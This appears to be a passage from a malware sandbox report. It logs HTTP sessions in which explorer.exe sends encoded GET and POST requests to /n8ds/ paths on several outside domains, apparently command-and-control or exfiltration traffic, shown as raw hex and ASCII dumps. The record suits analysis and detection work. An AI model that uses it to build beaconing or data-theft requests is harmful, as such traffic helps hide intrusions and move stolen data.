Df41MeMzZo7UX0pacDmeKPlZCbi43ya9yhsGTdVWXkaudzbaV2eoB6EsZgshrxWtc5nmZ3XZaLg(QL6xGCE~QiFP_CG8fXWedNk1D44uz(2yhCVwA0REwRiFk6Wmqx7jZvQrwaYSLq01jLNpemzr9vlwE1wAyVpi9DIP23OfMPgCy4MKdGAx6T0KrBjsTEKc_PjGOzdyRkc9WpGSiv9YdXlX04rtN~RCPHNn_6Nt9~bKNapDSboi8bsZfO1(9sDS1CDT-~Ufr3TO6WYtDph15cBIaDLcRvaLYl8OC8iRy9G1XhvFTQRfSQjLKNzSblhCayla0zI75yhY0Drptmxew2AeJrJUg9d8mSw0hTxcWhoQzmfw3Sm(xPth4iJosyyV-BlTFmSaX9h5gVrtTwOJ4(7TAT2pnckbt9KcJmadb4xFQ37vR6EEU5bFLQR5hpTwMTBwKsGkS3Ocl3oN1gJRV0svEtefZIfFOtf6F957eUwY2hyGkH2ZN87Cmv-PdnfTbVt4WbiH6eg65~hm9pAFpOz6S(YSNPOBuSvmZWBF7TMuVoF8Xu3drysVHUDueY8yMseudLzICD8U34PMzQW9VM2dsKwU3ufXOVDHbrJaJ7cFgxmL8hXZoW6ho5szQyANCwi86gNrF9QI97dYPJ4FMpKfTkjAFpCEsbuorBV8bevhQ1-d2jhK5z6PWlwcbsjtlupC8V8Er5n(dP9qDPNPtD7KzXrrptcfkscCHf2iftB~U1hprbov2tjWy(V4Zwvpc5fmDXPPOt0XWMRLoX4Sahv3ROrrPNu6ZbQlTmYHZnbR662XbsFW8VFvJjPBsz-eqHwV8GE5pobmpHdVleXtRHK9LdzBxKvmNw2ORNTtDS6JDm-NdGJgU0p1261BnTTrRLofvvmzUdEUypUAxlfK9cx15iZRQALKBqFfAY2DeKlBkZFPg1XZn45Qe2ozQ7TnNFENeRfVjFqlaTNjucbvRcC3Y8uUNYDKIjVTml4OerQpqf8d8iWMmhPy6wbAEYsN8IS79dA1ePqeWbY8Kk7T_6JwcmZ(HDyY0kSwJo8ESmi5iQTVurJCnUG13C7D1o0EYfJ5TMuGpymFzbdwTHGiBrn49HSErLWqwrs6Vx6LZKvawhVdSiKyB0tZTGGavkabADHrFmoNOYYxIezFW(SDnazMe3C7aw3IGUjncfmv3dZqM0dlD8X~wvORBH1HyIWA6OIHe4OdxDGDeE7fubEDbDRc48hwmW9Q64t0_HYerxkVVDnplqSRJNBBMUVXhc9u1BiIZWuNcpM0r1ieZsbQhTpsRTjlXW2vpb_XVlkjdwNExRmAc2DiYi6ebMJ0elSNTGeqzwFvkzZRfK1edqorTgHvr~CaJbRHfK9UuwLbu(Jprp2lfeH9_1UQLvM8xy2oxFsdh7-RwBaJcHy5dDTiBO9dcVDGqvmCysGBqcdcaXkrX1sATrf8I6ywEUzDpDWG8Y8nvK8PATMIJ~U8GoaWJBvWRJS(f8zKjzn4u~SrhtutP4xQx(Nd1sS~9fYSwiUCFc5TSUM80Noz_vzxT1YWSEiHCxIA7(9065T02uvbjviDL6aFui4oMe2fOAMzE7Tdlr4aZhUTToQ7xPHVlbL4X93gxCmrExRI6tNxZPhyvEFSayXrR9eVb5FHcY3(X1wZf606nYABgh0Lm3SyXzSpW7CDkaviVXPmAOLdZP_yj6I6CZC1Pr6lpGTNsSXMBhBQL1XwFLofn9GZvQUJz~R7JSTDHiSyzEbuBao(itEEYWGb8Tuj9PepXId2pejQqzXjOtw3dDpUSq_SI3185bJeM~iB9O3iBfu39nSKeq5GciLH58XGxLnkbk_mRE6reCqwhLKNUAGj6GTStPly_vUKGdb1F6hR7Nv2dKsmsDAWmCWkXRZkKFSqrzwsUND(qwbBjYYsNuLInjLIoQgeXi6n9W89bVliEklSFVBKZJDmK~w6h8GqwIPU5IL4U9Tiv7UXfcQ(udnjTUQ~FHVtqLERfVh43IkpzjCHRCNLaur1CUfxapYKq24vi4naFiSrolUvqAszmSmPu8AXHSrswy532nCIIbZfCpR6lqdUJ51BZhTOYB9t7o1JDWMSqjcE8I805D0lNwH8P~w~KQwaZby8gAZPeqt05G-3WAHHtDfS540KtnBKT5Ax8oXZcWarDnR5to-VCkG~GZWyyWBw25APOJqfoyrnMTACru6ApuTA-XyLzLnxqll0ovoieqz5yNTKUL7cnYIPwBA7zkkDb0BVaSADfcGSirWhANFkKGiyy7GvOp2yol4MHT7jOUZydfMojm5xQICOcnyD4y6hNRadRzdnoPF7x6iubk-fo51S5EhfniiIQvdFkCy3uY17_KTAuxNtGoqFpxbNbyG2ieFw04RfQ6XF-5LaskeGUURM3F_qQxy(w0afz(zxLzvmGQIilCJ6xD6IJWXmA5iqbxHi2MAvGECJq7KKKiRooLp5QdQJSOumnZjGETaHr(1iFZae9MN2OYiS9bkXvRPPz61g_gxQ8her4U1z9GPDCGpi6W4JPWFINRStBIipbs7eaIuQQMb0TrNaeuRbnobMNtG6dhrxGbCWOuTBM8ON2OVkaNh4WBWSsRTMEtUsmaprkhBqeMu2ycyJMqIjh04kM38yZNcuhgmwUrpuDWRGJMkKFbhU7H-3_7rRdzCLGJqiIHCUPg
                                                                                                                                                    Nov 29, 2021 14:10:39.924715996 CET6752OUTData Raw: 37 39 6e 39 51 77 47 58 47 67 50 64 54 30 4a 78 34 46 6b 54 34 62 68 6b 44 30 58 37 76 42 68 38 33 77 46 56 47 31 67 58 75 70 37 79 56 57 75 56 4c 68 72 78 72 4b 74 74 54 59 6a 35 32 78 41 4d 56 62 78 6c 58 54 57 51 31 34 59 4d 6f 62 6f 76 65 4f
                                                                                                                                                    Data Ascii: 79n9QwGXGgPdT0Jx4FkT4bhkD0X7vBh83wFVG1gXup7yVWuVLhrxrKttTYj52xAMVbxlXTWQ14YMoboveO3TemzYQqegAy5cFQ2cWwPqV0cLUaBDKZJiTPBE7mZUDiZTTXiWDWQqZMFmK_REoNAPRKSLbmOMW5W6bLiYLGNBDVVWcj0ezLw_G6PHtI1OtdV6NJjhDDB58kIcxiBmOutsbACsTgkBwRKPJLqeVRtiuegPmI2GXpT
                                                                                                                                                    Nov 29, 2021 14:10:39.933677912 CET6753OUTData Raw: 36 64 61 55 34 6b 72 79 77 32 67 69 32 6e 47 65 7a 56 63 6c 30 75 62 49 57 6d 57 41 54 73 56 50 31 38 4b 7a 4a 4a 6d 73 33 37 51 67 53 54 6c 48 6c 55 69 4c 72 34 4a 79 56 7a 52 65 6d 4e 61 2d 52 4e 41 36 43 33 54 79 36 56 54 71 35 6b 52 32 32 69
                                                                                                                                                    Data Ascii: 6daU4kryw2gi2nGezVcl0ubIWmWATsVP18KzJJms37QgSTlHlUiLr4JyVzRemNa-RNA6C3Ty6VTq5kR22ij-suwcLywcSGv-whP9wakGiWR9LP0saAZnSF2ot9nZgtvEcavkzo5DZ1JOxloqBRPdD-aLk42n8idcvnBQVRrjzjAFgTcnM-JPGOs9j4i-yXDYg7qJ0y3fgIS8R8TCj_S6E9QBFs(-9NCxH73xyzxEdlG9CI8U7su
                                                                                                                                                    Nov 29, 2021 14:10:39.933727980 CET6755OUTData Raw: 52 36 44 78 35 79 46 5f 36 4c 30 37 4a 4c 6f 36 61 63 33 6f 58 53 70 36 30 36 37 70 4d 7a 50 63 7e 51 6e 66 46 75 36 79 6a 6a 77 55 49 6e 6d 30 65 6d 7a 4d 57 5a 66 4b 69 6c 44 35 6d 54 64 47 7a 70 71 4f 42 4d 77 78 41 39 66 4b 72 58 35 61 71 6a
                                                                                                                                                    Data Ascii: R6Dx5yF_6L07JLo6ac3oXSp6067pMzPc~QnfFu6yjjwUInm0emzMWZfKilD5mTdGzpqOBMwxA9fKrX5aqjzTJZVBx6qj(ECruFJc308xiGGy8dbZnDB1zrAdmOveUF2hL5iB(u(f1YHKwjI6QXysuZtFJeS2EGc4lbOPU_8XfL5coUjq4N8nJHMb0ulnx2YKXHLR5zTpgfmYIxMvZtK_PLdZT6WTDDE-QehYNwObf9fdNAaHdbB
                                                                                                                                                    Nov 29, 2021 14:10:39.933789968 CET6757OUTData Raw: 59 52 56 7a 42 77 35 47 31 54 6b 34 39 30 37 75 5a 37 5a 58 72 77 46 6d 68 55 31 6b 42 4c 6c 70 6b 51 74 74 4d 4b 28 55 4b 54 34 6b 71 79 33 67 66 65 77 50 65 63 7a 7a 6e 45 73 50 6f 30 36 48 63 6a 45 6b 74 6c 68 67 4f 46 5a 43 58 7a 51 6a 73 51
                                                                                                                                                    Data Ascii: YRVzBw5G1Tk4907uZ7ZXrwFmhU1kBLlpkQttMK(UKT4kqy3gfewPeczznEsPo06HcjEktlhgOFZCXzQjsQPH4mkdP6HfgmZs49sbsKASxj~w~55XzVVmWJBP19CxibCJMKfXde1H0GvLfJLByrk1KCKBuHs27HRfLnnA81KAmgP-KpnIZrPRTYxqSu(G3ZL8GWXs0S3Ys5COrVgrjXdlaJ~Va6te49WpcoofeYQHSoO_XIsO9zv
                                                                                                                                                    Nov 29, 2021 14:10:39.935775042 CET6759OUTData Raw: 4b 37 62 68 61 52 30 6d 41 68 69 4f 6b 6a 32 65 56 38 5a 42 6c 59 42 67 55 79 4f 39 48 4d 5a 62 50 43 47 38 66 62 6c 55 54 65 77 77 72 30 47 4a 6b 45 76 46 79 79 7a 33 51 4f 4b 48 6a 71 57 52 28 72 4d 4e 31 51 6a 6a 4c 48 72 5a 33 67 45 52 4f 67
                                                                                                                                                    Data Ascii: K7bhaR0mAhiOkj2eV8ZBlYBgUyO9HMZbPCG8fblUTewwr0GJkEvFyyz3QOKHjqWR(rMN1QjjLHrZ3gEROgd-Kvxj8SimuUfKLOid577KEz1ONrtr7TFd1_0Lqg3RMzUg0euJ4bWvivco7qPQoUyrzHeA6NouDMp8CKCjinDHyakmZZY3h0bXeMSEDKxWhkpOuqGW4nL5(3Uwk7PJHTSdHHAdKqUrViQ6rCLfQ4vAMWSZ9J4HQ_3
                                                                                                                                                    Nov 29, 2021 14:10:39.935822964 CET6761OUTData Raw: 35 69 79 76 50 55 7a 47 50 6a 4a 73 39 66 63 5a 4e 78 6f 51 33 41 44 6f 46 33 35 58 77 4b 48 62 74 34 37 6e 37 41 31 51 30 51 72 6e 72 55 43 69 4e 48 75 66 67 65 45 38 59 33 58 61 42 6b 68 62 46 42 42 6a 48 2d 36 75 73 4b 77 4e 33 6f 74 71 31 6d
                                                                                                                                                    Data Ascii: 5iyvPUzGPjJs9fcZNxoQ3ADoF35XwKHbt47n7A1Q0QrnrUCiNHufgeE8Y3XaBkhbFBBjH-6usKwN3otq1mec0IY6uXHPJWmDq-5vyHsHg1NIFORSGtoz58rKLqBL6ixnUOk852AdBdvmvjTs(W7TpD90UxJUHKQyUeVNrep_ftBu1LzjNC~S7j1KXQ1BZL~-y3rEeWkXfsfbOKKKD0007LkKOWs2oR5spHiCljv0mM8ZMjjx2oK
                                                                                                                                                    Nov 29, 2021 14:10:39.935873985 CET6762OUTData Raw: 78 6c 68 34 64 46 78 5a 32 36 79 62 50 4b 28 4a 46 61 33 4f 51 35 59 38 61 46 31 35 49 63 6a 2d 58 52 28 7a 7a 30 34 55 66 46 68 76 6b 61 64 37 6a 61 45 4e 5a 71 64 70 63 44 4e 6d 75 49 41 2d 57 71 68 61 4a 78 69 41 44 36 64 7a 32 77 6a 69 36 65
                                                                                                                                                    Data Ascii: xlh4dFxZ26ybPK(JFa3OQ5Y8aF15Icj-XR(zz04UfFhvkad7jaENZqdpcDNmuIA-WqhaJxiAD6dz2wji6ee_ZyVq~cQKwWthWg49t69Xu3K229eFV8FtidJ5eY740AqgTpdIbfVDspRY2pImTn9jpLBSUaTx7L7mCJKQcCT3ztX55kO_3199t6Gz7lJSKvkXXOLEtp4M6d~iCLsc2AxEwFhmW5bseXErtjuYmul7HEpbD5TCsAI
                                                                                                                                                    Nov 29, 2021 14:10:39.936052084 CET6766OUTData Raw: 6b 63 48 73 54 35 72 78 68 4a 4a 54 62 65 39 71 5a 54 71 61 46 73 4c 45 72 6f 55 6f 48 48 6e 32 7e 64 43 70 79 39 37 6b 4c 41 65 56 51 71 57 37 7a 75 76 76 44 63 44 54 6b 48 74 64 44 46 53 47 39 57 67 54 6a 70 6e 6c 30 54 70 54 39 4b 56 36 6e 55
                                                                                                                                                    Data Ascii: kcHsT5rxhJJTbe9qZTqaFsLEroUoHHn2~dCpy97kLAeVQqW7zuvvDcDTkHtdDFSG9WgTjpnl0TpT9KV6nU7FzmPF1r9TmL3DHziatLD0iSvL3hBZoRlyFrb1uFPVBh8ivDzLm0zWXdB7KqJbQY8LiuJ4KduPu5v9qz5VK5CJ2RInROlmtsbSUiTfsVEvduiBBJg8LeaGhUzwulpy4r1nxb7rtdfC0-nRAUY5BMvhKWF5SLMVq4e
                                                                                                                                                    Nov 29, 2021 14:10:39.936229944 CET6777OUTData Raw: 43 75 51 78 5a 5a 58 74 63 6c 71 39 5a 79 51 47 50 36 54 34 65 36 48 62 68 55 49 4a 49 66 6e 72 4e 56 44 79 4f 46 51 6b 31 33 63 2d 77 6c 66 69 77 63 4f 44 79 71 64 39 4d 6f 48 49 44 2d 6f 51 33 4d 58 33 5a 49 7e 38 75 38 72 64 31 4e 6a 4f 44 51
                                                                                                                                                    Data Ascii: CuQxZZXtclq9ZyQGP6T4e6HbhUIJIfnrNVDyOFQk13c-wlfiwcODyqd9MoHID-oQ3MX3ZI~8u8rd1NjODQVpiKmV4RQe2YTudxg1odEyR-8lT9wXpggm4L2UyutxNvC0O-Eh8-guJTZOvQ~3FV9myTvjQ17uhT(qRaYh4JAzm_trhTwNEbauYeZLM9VOR6k86PKddzs_Z7Ac(I6DEl~kLPnTG70qPIOcMM~8u53quBa6JKp_Dot
                                                                                                                                                    Nov 29, 2021 14:10:39.936404943 CET6779OUTData Raw: 67 61 69 78 78 6e 50 41 71 73 78 79 63 37 53 73 56 72 57 6b 34 6b 36 51 4f 79 6a 4c 62 7a 34 34 57 33 64 48 47 33 36 45 76 4f 6c 6f 28 59 6d 4a 4e 76 75 6d 32 61 64 62 37 2d 76 54 34 43 35 67 50 76 65 79 39 61 69 6a 7e 4e 62 5a 6f 78 46 63 4e 54
                                                                                                                                                    Data Ascii: gaixxnPAqsxyc7SsVrWk4k6QOyjLbz44W3dHG36EvOlo(YmJNvum2adb7-vT4C5gPvey9aij~NbZoxFcNTP9gfEZKIMRbiIk8O4JCzv4zQwLoMl9Q646HcPiMz0GFahnJUX3m3cLMR(GJeuPJAMk(EcYkRTIl-V_Tz5Vz3VfXZglTGl4MTkYX1cF0pbXA97CzLp0PF3trKDiwaJ1nWZt38dRBYjAF-bQztNe0CIy7mStwDLgCem
                                                                                                                                                    Nov 29, 2021 14:10:40.095241070 CET6876INHTTP/1.1 405 Not Allowed
                                                                                                                                                    Server: openresty
                                                                                                                                                    Date: Mon, 29 Nov 2021 13:10:40 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 154
                                                                                                                                                    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_YF+BBr7CMwSU8Id/gSrcawEK3jT1i+cFrUEEtKs65nRY4jPgxIf7A2WuKrcmcnLVoJ8TlrGqTALUVzCaC6KScA
                                                                                                                                                    Via: 1.1 google
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    25192.168.11.204983734.102.136.18080C:\Windows\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Nov 29, 2021 14:10:39.935796022 CET6759OUTGET /n8ds/?lZOD=/jsG/ERKVryn6C207o/LcEim1QqN5MyxJsKeesIBefptic1Rr4NlAfFwHDf6m9wpfQov&y6AH=yHQDs HTTP/1.1
                                                                                                                                                    Host: www.littlefishth.com
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                    Data Ascii:
                                                                                                                                                    Nov 29, 2021 14:10:40.043905020 CET6875INHTTP/1.1 403 Forbidden
                                                                                                                                                    Server: openresty
                                                                                                                                                    Date: Mon, 29 Nov 2021 13:10:39 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 275
                                                                                                                                                    ETag: "618be735-113"
                                                                                                                                                    Via: 1.1 google
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    26192.168.11.204983881.2.194.12880C:\Windows\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Nov 29, 2021 14:10:50.261581898 CET6883OUTPOST /n8ds/ HTTP/1.1
                                                                                                                                                    Host: www.growebox.com
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 131142
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.growebox.com
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: */*
                                                                                                                                                    Referer: http://www.growebox.com/n8ds/
                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Data Raw: 6c 5a 4f 44 3d 54 30 79 6d 52 36 4d 6c 56 45 6a 7a 54 78 79 44 51 67 55 63 49 58 32 71 51 79 4d 53 78 35 66 79 54 37 4d 6f 73 4b 33 33 37 58 6d 38 31 2d 4e 49 75 35 52 5f 68 70 6d 58 73 39 6a 72 49 44 48 6a 28 6f 61 38 31 78 71 4e 75 4f 49 7a 4d 78 51 46 67 48 48 34 56 77 59 4c 4e 50 4d 6a 64 78 54 53 74 49 39 47 6a 34 6d 33 7a 5a 6c 52 6b 79 70 38 73 45 35 38 34 6b 67 53 61 70 4d 46 6c 70 55 5f 63 63 76 68 62 66 46 48 43 78 58 4c 36 4c 57 6f 39 41 53 4a 6a 70 48 64 37 72 6b 42 58 5f 58 4c 76 5f 4f 31 62 7a 6e 34 4a 4b 31 54 42 4c 68 4d 47 63 4c 4c 76 36 4f 70 69 4d 4a 72 28 79 49 4a 6b 70 61 50 56 76 47 68 4f 70 4b 6b 47 75 49 2d 62 55 6c 6d 62 47 62 35 43 43 63 44 54 5a 6a 39 43 45 33 4e 74 75 61 55 61 5a 55 6c 5a 52 61 57 6e 70 67 43 43 4a 32 64 4e 67 43 54 64 61 42 65 69 59 63 58 35 52 36 56 67 61 53 59 72 4b 38 62 36 51 64 61 7e 63 70 47 7e 78 6b 69 41 69 6e 73 49 57 48 31 71 5a 53 71 4f 7a 77 65 77 54 36 39 32 51 69 44 68 67 30 5a 7a 64 34 4a 46 63 50 4e 76 54 41 6e 69 74 65 61 54 4b 4b 74 62 67 41 2d 39 39 6d 52 30 6f 55 38 30 50 71 4b 46 46 58 53 67 32 68 77 43 31 61 65 7a 31 36 72 59 6c 6b 76 34 34 35 62 4b 5f 6b 43 61 35 6f 37 50 69 71 6a 6c 75 4e 4b 5a 74 61 71 28 41 59 4e 53 53 47 4b 55 51 76 64 79 46 42 46 38 6f 68 7a 6f 61 36 4a 72 47 67 52 61 41 4c 5a 4d 38 76 42 62 47 41 4c 28 47 59 77 65 56 64 55 51 72 61 43 4a 47 59 38 79 37 69 76 46 4a 5a 55 43 64 6c 75 61 73 51 31 67 6d 51 5a 69 39 59 70 68 6b 78 4a 70 4d 30 68 38 51 28 35 57 49 49 79 6c 46 6a 5a 32 6a 79 35 47 6d 33 52 56 35 51 6e 76 62 76 47 4b 45 72 66 4d 6c 4c 38 70 2d 6c 42 37 39 5a 65 4c 64 44 41 6e 38 57 79 63 4b 4a 31 6b 5f 41 52 79 58 67 6a 7a 62 4f 79 66 6f 72 63 6c 59 64 79 4a 37 36 54 64 6c 4d 57 47 46 49 63 79 42 71 4a 41 30 49 30 77 7a 6e 53 43 4f 63 47 72 74 77 45 44 53 79 42 63 78 28 69 6e 48 43 39 4a 67 46 6c 63 65 73 50 4c 4d 47 4e 28 6c 38 62 4c 44 69 69 28 6a 4d 2d 67 79 43 6d 77 5a 41 61 52 65 6b 4e 48 52 6d 4c 50 68 6f 4a 74 42 31 45 5a 54 4b 75 62 35 7a 74 38 5a 4f 41 79 6f 30 4c 75 6e 64 69 50 6f 38 41 7a 52 4a 75 66 65 6d 41 4c 50 31 68 47 41 57 70 74 4d 4d 6f 55 65 46 4b 61 2d 74 41 65 6d 4d 6e 6c 54 33 4c 45 30 31 4e 6c 6e 73 63 4d 50 36 45 67 42 43 50 79 65 7e 59 68 36 4c 61 79 6d 46 57 6c 71 4a 37 59 66 70 59 28 69 42 44 28 6b 4a 77 58 37 63 72 50 66 4c 75 35 6d 6b 2d 4e 53 75 4e 43 66 50 6b 6d 68 6a 4a 7e 74 39 6c 50 65 79 6a 7e 75 7a 46 36 61 6e 38 59 34 77 70 4b 59 50 45 71 5f 77 70 31 46 72 31 39 74 6d 47 5a 33 34 43 35 34 62 52 4c 62 49 67 78 67 75 41 73 53 38 74 46 34 58 37 63 46 74 35 70 34 45 54 6a 50 69 6e 47 4e 48 59 79 6b 42 41 76 6e 4f 69 33 42 71 53 48 51 41 30 53 7a 79 62 61 77 36 57 51 6f 50 59 61 4d 69 41 66 62 4f 68 4f 78 47 32 52 4b 67 53 42 4e 72 2d 63 36 72 78 50 44 78 67 6a 4b 53 67 51 70 6e 53 4d 58 6f 6d 50 56 65 77 45 59 6f 45 73 38 64 31 4c 51 65 30 63 6b 66 6f 34 72 49 6f 37 5f 63 65 76 49 47 4f 65 6d 54 55 7a 65 42 69 70 47 56 45 6a 6d 73 75 4b 4c 6f 66 62 62 6b 57 4a 4f 41 74 74 47 69 66 6e 4b 67 36 32 6a 70 43 47 63 6b 48 63 31 46 50 77 5f 55 53 6a 41 72 6c 6c 54 6c 56 4a 62 44 54 37 53 6f 79 73 74 67 30 52 39 57 59 70 53 62 51 7a 61 39 49 76 34 36 46 66 41 61 61 7a 36 75 4f 51 38 33 6b 54 6e 76 47 43 6f 58 42 36 4d 55 54 62 59 69 66 44 37 50 70 36 31 59 4a 42 63 30 64 38 4e 6d 56 6c 71 46 7a 30 59 58 6f 56 45 44 75 75 39 4d 6f 6a 6a 52 4a 6a 6c 64 45 6a 73 45 31 79 46 59 55 74 37 59 34 56 34 44 50 43 5a 6c 79 45 39 63 51 30 5f 66 68 37 4b 7e 74 59 61 32 79 66 52 6e 65 6a 6b 59 6d 65 6b 68 4a 70 69 34 4b 6c 46 6d 4d 46 30 63 6c 45 4e 6d 6b 6b 4e 61 48 6d 62 75 50 38 65 71 67 67 57 30 43 48 67 4c 66 71 53 31 5f 7e 61 7e 56 38 4d 56 52 46 69 7a 6f 66 6f 49 78 4e 63 67 66 4b 65 57 50 54 59 65 34 79 6c 72 64 41 72 77 52 6a 64 7a 4b 28 4a 62 6a 4f 49 47 70 41 56 53 47 34 70 46 67 4b 31 51 37 4d 32 45 33 30 4a 36 4a 52 6e 28 50 50 30 4f 52 36 37 6e 75 76 6c 4b 68 37 4c 30 4a 6a 37 59 46 6a 39 53 63 54 41 69 68 62 6f 49 6c 35 53 4a 53 4f 34 55 41 64 33 4c 31 58 53 39 74 4f 31 63 45 6d 7a 31 62 36 52 63 61 75 55 4e 70 59 48 39 36 6c 58 70 67 69 6e 36 41 59 4d 50 55 51 4f 46 71 34 71 53 45 5a 4c
                                                                                                                                                    Data Ascii: lZOD=T0ymR6MlVEjzTxyDQgUcIX2qQyMSx5fyT7MosK337Xm81-NIu5R_hpmXs9jrIDHj(oa81xqNuOIzMxQFgHH4VwYLNPMjdxTStI9Gj4m3zZlRkyp8sE584kgSapMFlpU_ccvhbfFHCxXL6LWo9ASJjpHd7rkBX_XLv_O1bzn4JK1TBLhMGcLLv6OpiMJr(yIJkpaPVvGhOpKkGuI-bUlmbGb5CCcDTZj9CE3NtuaUaZUlZRaWnpgCCJ2dNgCTdaBeiYcX5R6VgaSYrK8b6Qda~cpG~xkiAinsIWH1qZSqOzwewT692QiDhg0Zzd4JFcPNvTAniteaTKKtbgA-99mR0oU80PqKFFXSg2hwC1aez16rYlkv445bK_kCa5o7PiqjluNKZtaq(AYNSSGKUQvdyFBF8ohzoa6JrGgRaALZM8vBbGAL(GYweVdUQraCJGY8y7ivFJZUCdluasQ1gmQZi9YphkxJpM0h8Q(5WIIylFjZ2jy5Gm3RV5QnvbvGKErfMlL8p-lB79ZeLdDAn8WycKJ1k_ARyXgjzbOyforclYdyJ76TdlMWGFIcyBqJA0I0wznSCOcGrtwEDSyBcx(inHC9JgFlcesPLMGN(l8bLDii(jM-gyCmwZAaRekNHRmLPhoJtB1EZTKub5zt8ZOAyo0LundiPo8AzRJufemALP1hGAWptMMoUeFKa-tAemMnlT3LE01NlnscMP6EgBCPye~Yh6LaymFWlqJ7YfpY(iBD(kJwX7crPfLu5mk-NSuNCfPkmhjJ~t9lPeyj~uzF6an8Y4wpKYPEq_wp1Fr19tmGZ34C54bRLbIgxguAsS8tF4X7cFt5p4ETjPinGNHYykBAvnOi3BqSHQA0Szybaw6WQoPYaMiAfbOhOxG2RKgSBNr-c6rxPDxgjKSgQpnSMXomPVewEYoEs8d1LQe0ckfo4rIo7_cevIGOemTUzeBipGVEjmsuKLofbbkWJOAttGifnKg62jpCGckHc1FPw_USjArllTlVJbDT7Soystg0R9WYpSbQza9Iv46FfAaaz6uOQ83kTnvGCoXB6MUTbYifD7Pp61YJBc0d8NmVlqFz0YXoVEDuu9MojjRJjldEjsE1yFYUt7Y4V4DPCZlyE9cQ0_fh7K~tYa2yfRnejkYmekhJpi4KlFmMF0clENmkkNaHmbuP8eqggW0CHgLfqS1_~a~V8MVRFizofoIxNcgfKeWPTYe4ylrdArwRjdzK(JbjOIGpAVSG4pFgK1Q7M2E30J6JRn(PP0OR67nuvlKh7L0Jj7YFj9ScTAihboIl5SJSO4UAd3L1XS9tO1cEmz1b6RcauUNpYH96lXpgin6AYMPUQOFq4qSEZLypgN75~UDpCARjQPJdHdBoYi7LzRz8kHmfNf3FgWqNJRk44IV7oqM0IuDyteZwKpARl4ITLfBzPzGDKOK7r0nPHhHyTKvTrIfsEA9YOvbhnsKSZbTQmIqAjNapwa3MxLv197G8CT8-pJYiwW0KqHnXNFftBPoZS6I5A3lEUQCOFRgonyTHY-C8o5qeJgGLNIibnwIqddAXoD29IpArqVDMrVy8DZg8p0ApFCey7eT7wt(bv5cVylCH9N9wbq69yxdemBOqqYdSSfmYCGx8fu17~EagOvc1u6qMZIN6qXbLFQf-~Z8TBFQUT1hc(QWQ4PzLWzeWrfVLruHSyPXpuhluakEB1dZjKxVRuROLsQdijz8qw4pqfrK5eACOaN5VzvKKoPwhInihFHlcsf~Wbs5PnFgjZt50L_CXrn56UNl2oQsY7Yx-bu6Mwl(90C0KctwJivJ8uHqJjw(nFKjzDAHTLWB9t2le2AmIZp6iugEO8ettQ4~jTARwBI(RHaQQNxGCRicc4SdmZYcF4sHwwkeMNAJZioWm4Cm5tUIlCiaiMWq_0KCUweYDCAQqRs9MX_F9EJVHk_qvIqexe775qgJAy2FMVTuM(Agurn5YdM8sDGTudqbSbZYgAP2_7znuawb9bqY